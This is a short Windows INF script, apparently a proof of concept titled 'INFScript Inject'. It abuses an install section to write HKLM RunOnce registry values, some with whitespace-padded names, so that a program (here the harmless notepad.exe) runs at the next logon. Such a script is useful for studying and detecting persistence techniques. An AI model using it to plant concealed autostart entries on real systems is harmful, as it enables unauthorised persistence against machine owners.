[STRINGS]
KEY_RUNONCE = "Software\Microsoft\Windows\CurrentVersion\RunOnce"
KEY_REMOVE  = "Software\Microsoft\Windows\CurrentVersion\Uninstall"
ADD_1 = "Powershell_Execute"
;; Locasised strings
;;; Author Mat harr0ey
;;; English INFScript Inject
ADD_3 = "PowerShell Execution"
ADD_4 = "PowerShell:>"
[version]
signature="$CHICAGO$"

[DefaultInstall]
AddReg = Titre.Reg

[Titre.Reg]
HKLM,%KEY_RUNONCE%\setup,"               "%ADD_1% 
HKLM,%KEY_RUNONCE%\setup,"___________________________"
HKLM,%KEY_RUNONCE%\setup,%ADD_3%
HKLM,%KEY_RUNONCE%\setup,""
HKLM,%KEY_RUNONCE%\setup,%ADD_4%,0,"notepad.exe"
[Question]
Prompt 	= %NEW_1%
ButtonType = YESNO
Title 	= %ADD_1%

